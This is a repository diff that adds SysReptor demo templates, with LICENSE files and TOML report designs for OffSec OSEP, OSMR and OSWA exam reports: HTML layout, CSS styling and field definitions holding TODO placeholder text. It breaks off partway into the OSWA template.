id = "a48695e2-2e6d-4f62-aa98-d3603d0c81eb"
poc = "TODO Provide the final proof of concept code used to gain access to the server."
proof = "TODO Provide the contents of proof.txt"
steps = "TODO Provide a detailed account of your methodology in creating the exploit. The steps taken should be able to be easily followed and reproducible if necessary. "
ropchain = "TODO Provide the ASM ROP chains used in the exploit with a brief explanation for each gadget."
screenshots = "TODO Provide a screenshot of the ipconfig command and the contents of proof.txt."
[[assets]]
id = "44f2c88c-11bb-45a8-a94c-95723b19529b"
name = "LICENSE"

21
demo_data/offsec-designs/osep-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

580
demo_data/offsec-designs/osep.toml Normal file
View File

@ -0,0 +1,580 @@
format = "projecttypes/v1"
id = "9efe3b9d-b0df-45e0-86d9-a5bc7bcbb525"
name = "OSEP Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"enumeration",
"compromise",
"postexploitation",
"privilegeescalation",
"screenshots",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSEP Exam Documentation {.in-toc.numbered}
The Offensive Security OSEP exam documentation contains all efforts that were conducted in order to pass the Offensive Security Experienced Penetration Tester exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Experienced Penetration Tester certification.
## Objective {.in-toc.numbered}
The objective of this assessment is to perform an external penetration test against the Offensive Security Exam network. The student is tasked with following methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including enumeration and post-exploitation. The exam report is not meant to be a penetration test report, but rather a writeup of the steps taken to locate, enumerate and compromise the network.
Enumeration and post-exploitation actions that lead to subsequent attacks with successful compromises should be included in the report.
An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this exam. Use the sample report as a guideline to get you through the reporting.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* High level summery of findings, including the depth of compromise.
* Methodology walkthrough and detailed outline of steps taken including enumeration.
* Each finding with included screenshots, walkthrough, sample code or reference.
* Screenshot of any local.txt, proof.txt or secret.txt.
</markdown>
<pagebreak/>
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown :text="report.highlevel_summary" />
</section>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Local.txt/Proof.txt/Secret.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-if="finding.enumeration">
<h3 class="in-toc numbered">Pre-Compromise Enumeration Steps</h3>
<markdown :text="finding.enumeration" />
</div>
<div v-if="finding.compromise">
<h3 class="in-toc numbered" >Compromise</h3>
<markdown :text="finding.compromise" />
</div>
<div v-if="finding.postexploitation">
<h3 class="in-toc numbered">Post-Exploitation Enumeration Steps</h3>
<markdown :text="finding.postexploitation" />
</div>
<div v-if="finding.privilegeescalation">
<h3 class="in-toc numbered">Local Privilege Escalation</h3>
<markdown :text="finding.privilegeescalation" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #3d85c6;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSEP Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = "TODO A brief description of the attack chain with machine names, including the depth of compromise should be included here."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "highlevel_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of local.txt, proof.txt or secret.txt"
required = true
[finding_fields.compromise]
type = "markdown"
label = "Compromise"
origin = "custom"
default = "TODO Provide a description of exploitation steps to compromise the machine and obtain shell access, the steps taken should be able to be easily followed and reproducible if necessary. Only the steps that ended up working are required. Include any custom code or references to public tools."
required = true
[finding_fields.enumeration]
type = "markdown"
label = "Enumeration"
origin = "custom"
default = "TODO Provide relevant techniques and methods used to perform enumeration prior to initial compromise, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the local.txt, proof.txt and secret.txt files obtained from your exam machines must be submitted in the control panel before your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each local.txt, proof.txt and secret.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using `ipconfig`, `ifconfig` or `ip addr`.
"""
required = true
[finding_fields.postexploitation]
type = "markdown"
label = "Post-Exploitation"
origin = "custom"
default = "TODO Provide relevant post-exploitation enumeration steps related to the network or local privilege escalation, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
required = true
[finding_fields.privilegeescalation]
type = "markdown"
label = "Privilege Escalation"
origin = "custom"
default = "TODO Provide a description of exploitation steps to escalate privileges on the machine if applicable, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSEP Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
highlevel_summary = "TODO A brief description of the attack chain with machine names, including the depth of compromise should be included here."
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "192.168.X.X"
cvss = "n/a"
id = "b8395ecb-13fe-48dc-812d-5c739c448510"
proof = "TODO Provide the contents of local.txt, proof.txt or secret.txt"
compromise = "TODO Provide a description of exploitation steps to compromise the machine and obtain shell access, the steps taken should be able to be easily followed and reproducible if necessary. Only the steps that ended up working are required. Include any custom code or references to public tools."
enumeration = "TODO Provide relevant techniques and methods used to perform enumeration prior to initial compromise, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
screenshots = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the local.txt, proof.txt and secret.txt files obtained from your exam machines must be submitted in the control panel before your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each local.txt, proof.txt and secret.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using `ipconfig`, `ifconfig` or `ip addr`.
"""
postexploitation = "TODO Provide relevant post-exploitation enumeration steps related to the network or local privilege escalation, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
privilegeescalation = "TODO Provide a description of exploitation steps to escalate privileges on the machine if applicable, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
[[assets]]
id = "29d56052-480c-4b61-bd63-d8f48969975c"
name = "LICENSE"

21
demo_data/offsec-designs/osmr-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

576
demo_data/offsec-designs/osmr.toml Normal file
View File

@ -0,0 +1,576 @@
format = "projecttypes/v1"
id = "ea7efb89-8c2b-4008-99e2-419611fdb979"
name = "OSMR Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"initial_analysis",
"vulnerability_discovery",
"exploit_creation",
"screenshots",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSMR Exam Documentation {.in-toc.numbered}
The Offensive Security OSMR exam documentation contains all efforts that were conducted in order to pass the Offensive Security macOS Researcher exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security macOS Researcher certification.
## Objective {.in-toc.numbered}
The objective of this exam is to solve four given assignments as described in the control panel. The student is tasked with following a methodical approach in analyzing and solving the assignments. The exam report is meant to be a writeup of the steps taken to solve the assignment, including any analysis performed and code written.
An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this exam. Use the sample report as a guideline to get you through the reporting, while removing any headlines that are not relevant to a specific assignment.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* High-Level summary of assignment solutions.
* Methodology walkthrough and detailed outline of steps taken through analysis and all written code.
* Each finding with included screenshots, walkthrough, sample code or reference.
* Screenshots of proofs.
</markdown>
<pagebreak/>
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown :text="report.highlevel_summary" />
</section>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Assignments</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-if="finding.initial_analysis">
<h3 class="in-toc numbered">Initial Analysis</h3>
<markdown :text="finding.initial_analysis" />
</div>
<div v-if="finding.vulnerability_discovery">
<h3 class="in-toc numbered">Vulnerability Discovery</h3>
<markdown :text="finding.vulnerability_discovery" />
</div>
<div v-if="finding.exploit_creation">
<h3 class="in-toc numbered">Exploit or Bypass Creation</h3>
<markdown :text="finding.exploit_creation" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #a0a0a0;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSMR Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = "TODO A brief description of the assignments that were solved, including the overall exploitation steps."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "highlevel_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Assignment"
origin = "core"
default = "TODO Assignment Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of local.txt, proof.txt or secret.txt."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the local.txt, proof.txt or secret.txt files obtained from your exam machines must be submitted in the control panel before your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each local.txt, proof.txt or secret.txt found must be shown in a screenshot that includes the con-tents of the file, as well as the IP address of the target by using ipconfig.
"""
required = true
[finding_fields.exploit_creation]
type = "markdown"
label = "Exploit or Bypass Creation"
origin = "custom"
default = "TODO Provide a description of steps to create the exploit or security control bypass. At the end of this section the full exploit (or bypass) code should be developed while an explanation of each step should be performed."
required = true
[finding_fields.initial_analysis]
type = "markdown"
label = "Initial Analysis"
origin = "custom"
default = "TODO Provide relevant techniques and methods used to perform enumeration and discovery of the application and/or the environment. The steps taken should be reproducible and easy to under-stand. Include any custom code or references to public tools."
required = true
[finding_fields.vulnerability_discovery]
type = "markdown"
label = "Vulnerability Discovery"
origin = "custom"
default = """
TODO Provide relevant analysis steps to locate vulnerability inside the application or environment, this includes results from static analysis and/or dynamic analysis. Explain the vulnerability identified.
Only the steps that ended up working are required.
"""
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSMR Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
highlevel_summary = "TODO A brief description of the assignments that were solved, including the overall exploitation steps."
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "TODO Assignment Name"
cvss = "n/a"
id = "cc0cb8c0-5ee8-4fc9-b1a0-a659e31ac2fb"
proof = "TODO Provide the contents of local.txt, proof.txt or secret.txt."
screenshots = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the local.txt, proof.txt or secret.txt files obtained from your exam machines must be submitted in the control panel before your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each local.txt, proof.txt or secret.txt found must be shown in a screenshot that includes the con-tents of the file, as well as the IP address of the target by using ipconfig.
"""
exploit_creation = "TODO Provide a description of steps to create the exploit or security control bypass. At the end of this section the full exploit (or bypass) code should be developed while an explanation of each step should be performed."
initial_analysis = "TODO Provide relevant techniques and methods used to perform enumeration and discovery of the application and/or the environment. The steps taken should be reproducible and easy to under-stand. Include any custom code or references to public tools."
vulnerability_discovery = """
TODO Provide relevant analysis steps to locate vulnerability inside the application or environment, this includes results from static analysis and/or dynamic analysis. Explain the vulnerability identified.
Only the steps that ended up working are required.
"""
[[assets]]
id = "675262f8-fd52-4714-bf61-57de672585df"
name = "LICENSE"

21
demo_data/offsec-designs/oswa-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

562
demo_data/offsec-designs/oswa.toml Normal file
View File

@ -0,0 +1,562 @@
format = "projecttypes/v1"
id = "15e47af0-c357-4a5e-a033-c31d51f249d0"
name = "OSWA Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"vulnerabilities",
"poc",
"screenshots",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
